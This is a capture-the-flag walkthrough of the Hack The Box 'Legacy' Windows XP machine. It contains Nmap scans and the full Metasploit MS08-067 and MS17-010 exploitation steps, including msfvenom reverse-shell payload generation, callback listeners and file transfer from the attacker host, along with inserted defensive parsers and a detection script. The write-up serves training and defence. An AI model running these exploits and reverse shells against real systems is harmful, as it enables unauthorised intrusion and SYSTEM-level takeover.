Reconnaissance: Portscan with Nmap
As always, we start with a port scan with Nmap to enumerate open ports and service versions. For those who want to know more about Nmap's commands and options, refer to my Nmap Cheatsheet:
nmap -sC -sV -oA legacy 10.10.10.4
-sC: default script scan
-sV: service version detection against open ports
-oA: Output in the three major formats at once
root@kali:~/Desktop/htb/legacy# nmap -sC -sV -oA legacy 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-03 09:22 EDT
Nmap scan report for 10.10.10.4
Host is up (0.27s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h30m47s, deviation: 2h07m16s, median: 4d23h00m47s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:9c:4d (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-05-08T18:23:37+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
The Nmap scan results show:
PORT     | STATE  | SERVICE       | VERSION
139/tcp  | open   | netbios-ssn   | Microsoft Windows netbios-ssn
445/tcp  | open   | microsoft-ds  | Windows XP microsoft-ds
3389/tcp | closed | ms-wbt-server |
nmap -p 139,445 --script vuln -Pn -n 10.10.10.4
-p <port ranges>: Set destination port(s)
--script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories
-Pn: Treat all hosts as online -- skip host discovery
-n: Do not resolve hostnames via DNS
root@kali:~/Desktop/htb/legacy# nmap -p 139,445 --script vuln -Pn n 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-03 09:34 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Failed to resolve "n".
Nmap scan report for 10.10.10.4
Host is up (0.27s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
From the result above, the target appears vulnerable to both MS08-067 (used by Conficker) and MS17-010 (made famous by WannaCry).
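To turn the two scans above into something a defender or auditor can act on, here is an added example (not part of this writeup) that parses Nmap's host-script block, the lines under "Host script results:", into per-script state and CVE ids, and then flags what matters: the smb-vuln-* scripts reporting VULNERABLE or LIKELY VULNERABLE, and smb-security-mode reporting message signing disabled. The sample input is a constructed, trimmed copy of the output shown above; the function names parse_host_scripts and triage are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample: the "Host script results:" sections of the two scans
# above, trimmed to the lines the parser cares about.
SAMPLE_NSE_OUTPUT = """\
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""


@dataclass
class ScriptResult:
    """One NSE script's output for a host."""
    name: str
    state: str = ""                               # "VULNERABLE", "false", "ERROR: ...", ...
    cves: List[str] = field(default_factory=list)
    details: Dict[str, str] = field(default_factory=dict)


HEADER = re.compile(r"^([\w-]+):\s*(.*)$")        # "script-name: optional value"
NESTED = re.compile(r"^([^:]+):(?:\s+(.*))?$")    # "Key: value"; bare URLs do not match
CVE_ID = re.compile(r"CVE-\d{4}-\d+")


def parse_host_scripts(text: str) -> Dict[str, ScriptResult]:
    """Parse Nmap's "| ..." host-script block into {script name: ScriptResult}."""
    results: Dict[str, ScriptResult] = {}
    current = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                 # port table, banner, prompt: not script output
        body = raw[2:]               # drop the leading "| " or "|_"
        if not body.strip():
            continue                 # blank separator line inside a script
        if not body[0].isspace():    # unindented: a new script starts here
            m = HEADER.match(body)
            if not m:
                continue
            current = ScriptResult(name=m.group(1), state=m.group(2).strip())
            results[current.name] = current
            continue
        if current is None:
            continue
        m = NESTED.match(body.strip())
        if not m:
            continue                 # free-text description line
        key, value = m.group(1).strip(), (m.group(2) or "").strip()
        current.details[key] = value
        if key == "State":
            current.state = value
        elif key == "IDs":
            current.cves.extend(CVE_ID.findall(value))
    return results


def triage(results: Dict[str, ScriptResult]) -> List[Tuple[str, str, str]]:
    """Return (script, finding, cves) for results that need patching or hardening."""
    findings: List[Tuple[str, str, str]] = []
    for name, r in results.items():
        state = r.state.upper()
        if name.startswith("smb-vuln-") and "VULNERABLE" in state and not state.startswith("NOT"):
            findings.append((name, r.state, ",".join(r.cves)))
    sec = results.get("smb-security-mode")
    if sec and sec.details.get("message_signing", "").startswith("disabled"):
        findings.append(("smb-security-mode", "message_signing disabled", ""))
    return findings


if __name__ == "__main__":
    for script, finding, cves in triage(parse_host_scripts(SAMPLE_NSE_OUTPUT)):
        print(f"{script:22} {finding:26} {cves}")
```

The parser reads the normal-format output that -oA writes to legacy.nmap, so the same function can be run over the saved scan of every host in a range; states such as "false", "NOT VULNERABLE" and "ERROR: ..." are kept in the result but deliberately left out of the triage list.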
Exploit: MS08-067 with Metasploit
First things first, we’ll execute “search ms08-067” on MSF to find exploit modules.
msf > search ms08-067
msf > search ms08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
We'll use the module "exploit/windows/smb/ms08_067_netapi" from the result and run it after setting the required options.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
msf exploit(windows/smb/ms08_067_netapi) > set lhost 10.10.14.21
msf exploit(windows/smb/ms08_067_netapi) > run
We successfully get a shell running as "NT AUTHORITY\SYSTEM":
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
The following information on the target can be checked with the commands "sysinfo" (Meterpreter) and "systeminfo" (Windows shell):
– OS: Microsoft Windows XP Professional
– OS Version: 5.1.2600 Service Pack 3 Build 2600
– Architecture: x86
– Hotfix: Q147222
– Original Install Date: 16/3/2017, 7:32:23
meterpreter > sysinfo
Computer        : LEGACY
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1596 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name:                 LEGACY
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          user
Registered Organization:   HTB
Product ID:                55274-643-7213323-23904
Original Install Date:     16/3/2017, 7:32:23
System Up Time:            0 Days, 0 Hours, 2 Minutes, 28 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~1999 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     511 MB
Available Physical Memory: 366 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.998 MB
Virtual Memory: In Use:    50 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.4
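The "Hotfix(s)" section is the line to check on a host like this: Q147222 is the only update installed, so neither bulletin has been patched. As an added example (not part of this writeup), the script below parses systeminfo output and reports which of the two bulletins is missing. The KB numbers (KB958644 for MS08-067, KB4012598 for MS17-010 on Windows XP SP3) come from Microsoft's bulletins, not from the writeup; the sample input is a constructed, trimmed copy of the output shown above, and the function names are my own.

```python
import re
from typing import Any, Dict, List, Set

# Constructed sample: a trimmed copy of the systeminfo output shown above.
SAMPLE_SYSTEMINFO = """\
Host Name:                 LEGACY
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Configuration:          Standalone Workstation
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
"""

# Update that closes each bulletin on Windows XP SP3. The KB numbers are taken
# from Microsoft's bulletins, not from the writeup; add rows for other OS versions.
REQUIRED_UPDATES: Dict[str, Set[str]] = {
    "MS08-067": {"KB958644"},
    "MS17-010": {"KB4012598"},
}

HOTFIX_LINE = re.compile(r"^\s*\[\d+\]:\s*(\S+)")   # "[01]: Q147222"


def parse_systeminfo(text: str) -> Dict[str, Any]:
    """Parse top-level "Key: value" lines; collect the indented hotfix entries."""
    info: Dict[str, Any] = {"hotfixes": set()}
    section = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():             # top-level "Key: value"
            key, _, value = line.partition(":")
            info[key.strip()] = value.strip()
            section = key.strip()
        elif section == "Hotfix(s)":          # continuation line under Hotfix(s)
            m = HOTFIX_LINE.match(line)
            if m:
                info["hotfixes"].add(m.group(1).upper())
    return info


def normalize_kb(ident: str) -> str:
    """Older updates are listed with a Q prefix (Q147222); compare everything as KB."""
    ident = ident.upper()
    return "KB" + ident[1:] if ident.startswith("Q") else ident


def missing_updates(info: Dict[str, Any],
                    required: Dict[str, Set[str]] = REQUIRED_UPDATES) -> List[str]:
    """Bulletins for which none of the accepted KBs is installed, sorted by id."""
    installed = {normalize_kb(h) for h in info["hotfixes"]}
    return sorted(b for b, kbs in required.items() if not kbs & installed)


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["OS Name"], "-", info["OS Version"])
    print("missing:", ", ".join(missing_updates(info)) or "none")
```

On the Legacy box the result is both bulletins missing, which matches what the Nmap vuln scripts reported from the outside; the same check run against a fleet's systeminfo exports gives the patch-verification view that the network scan cannot.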
Exploit: MS17-010
We will also show how to compromise the target with another exploit, "MS17-010", using the Python script "send_and_execute.py" for XP machines from helviojunior:
git clone https://github.com/helviojunior/MS17-010
This Python script requires a reverse-shell payload that is executed once the exploit succeeds. So, let's create the stageless payload "windows/shell_reverse_tcp" named "shell.exe" with Msfvenom. If you are not familiar with Msfvenom's command options, see below:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe
-p, --payload: Payload to use. Specify a '-' or stdin to use custom payloads
-f, --format: Output format
-a, --arch: The architecture to use
--platform: The platform of the payload
-o, --out: Save the payload
root@kali:~/Desktop/htb/legacy# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
After the payload is created, run the script "send_and_execute.py" with the target IP and the path to the payload specified:
python send_and_execute.py 10.10.10.4 ../shell.exe
root@kali:~/Desktop/htb/legacy/MS17-010# python send_and_execute.py 10.10.10.4 ../shell.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81f38570
SESSION: 0xe20e4830
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe21c03f8
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe21c0498
overwriting token UserAndGroups
Sending file KE7D5J.exe...
Opening SVCManager on 10.10.10.4.....
Creating service SFNP.....
Starting service SFNP.....
The NETBIOS connection with the remote host timed out.
Removing service SFNP.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done
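Note what the run above leaves behind on the target: a file with a random name (KE7D5J.exe) is uploaded, a service with a random four-letter name (SFNP) is created and started through the Service Control Manager, and the service is removed again. On Windows, every service installation is recorded in the System event log as Event ID 7045 ("A service was installed in the system"), which is what a defender would watch for this pattern. As an added example (not part of this writeup or of the MS17-010 repository), the script below runs a few heuristics over constructed 7045 records; the image path C:\WINDOWS\KE7D5J.exe is an assumption about where the upload would land, and the function names are my own.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: two System-log "A service was installed in the system"
# records (Event ID 7045) reduced to the fields a detector needs. The first
# mirrors what the run above would leave behind (service SFNP, binary
# KE7D5J.exe); its image path C:\WINDOWS\KE7D5J.exe is an assumption, not
# something the writeup shows. The second is an ordinary VMware Tools install.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"event_id": "7045", "time": "2020-05-08T18:25:01", "service_name": "SFNP",
     "image_path": r"C:\WINDOWS\KE7D5J.exe", "start_type": "demand start",
     "account": "LocalSystem"},
    {"event_id": "7045", "time": "2020-05-08T18:20:00", "service_name": "VMTools",
     "image_path": r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe",
     "start_type": "auto start", "account": "LocalSystem"},
]

RANDOM_SERVICE_NAME = re.compile(r"^[A-Z]{4}$")        # e.g. SFNP
RANDOM_EXE_NAME = re.compile(r"^[A-Z0-9]{4,8}\.exe$")  # e.g. KE7D5J.exe; case-sensitive on purpose
WINDOWS_ROOT = r"c:\windows"                            # assumed drop location (ADMIN$ share root)


def service_install_indicators(evt: Dict[str, str]) -> List[str]:
    """Reasons a 7045 record looks like a remotely pushed, throw-away service."""
    reasons: List[str] = []
    if evt.get("event_id") != "7045":
        return reasons
    name = evt.get("service_name", "")
    path = evt.get("image_path", "").strip('"')
    parent, _, exe = path.rpartition("\\")
    if RANDOM_SERVICE_NAME.match(name):
        reasons.append("four-letter uppercase service name")
    if RANDOM_EXE_NAME.match(exe):
        reasons.append("random-looking binary name")
    if parent.lower() == WINDOWS_ROOT:
        reasons.append("binary dropped in the Windows directory root")
    if evt.get("start_type") == "demand start" and evt.get("account") == "LocalSystem":
        reasons.append("demand-start service running as LocalSystem")
    return reasons


def flag_service_installs(events: List[Dict[str, str]],
                          min_reasons: int = 2) -> List[Tuple[str, List[str]]]:
    """Return (service name, reasons) for every record with at least min_reasons hits."""
    flagged: List[Tuple[str, List[str]]] = []
    for evt in events:
        reasons = service_install_indicators(evt)
        if len(reasons) >= min_reasons:
            flagged.append((evt.get("service_name", "?"), reasons))
    return flagged


if __name__ == "__main__":
    for name, reasons in flag_service_installs(SAMPLE_EVENTS):
        print(name, "->", "; ".join(reasons))
```

A single indicator is weak on its own (plenty of legitimate services are demand-start and run as LocalSystem), so the detector requires two before it flags a record; on a real host the 7045 record would be correlated with the SMB session on port 445 that preceded it.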
We get a shell on a Netcat listener started beforehand, but it turns out that whoami.exe, used to check the current user, is not present on the target.
root@kali:~/Desktop/htb/legacy# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.4] 1034
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
What we can do here is launch smbserver.py on our attacking machine to share whoami.exe with the target under the share name "share".
root@kali:~/Desktop/htb/legacy# ls
impacket ms08-067.py MS17-010 shell.exe smbserver.py whoami.exe
root@kali:~/Desktop/htb/legacy# python smbserver.py share .
On the target, you can copy whoami.exe to the current folder and run it.
C:\WINDOWS\system32>copy \\10.10.14.21\share\whoami.exe .
copy \\10.10.14.21\share\whoami.exe .
        1 file(s) copied.

C:\WINDOWS\system32>whoami
whoami
NT AUTHORITY\SYSTEM
Link
- HTB:Legacy | 0xdf hacks stuff
https://0xdf.gitlab.io/2019/02/21/htb-legacy.html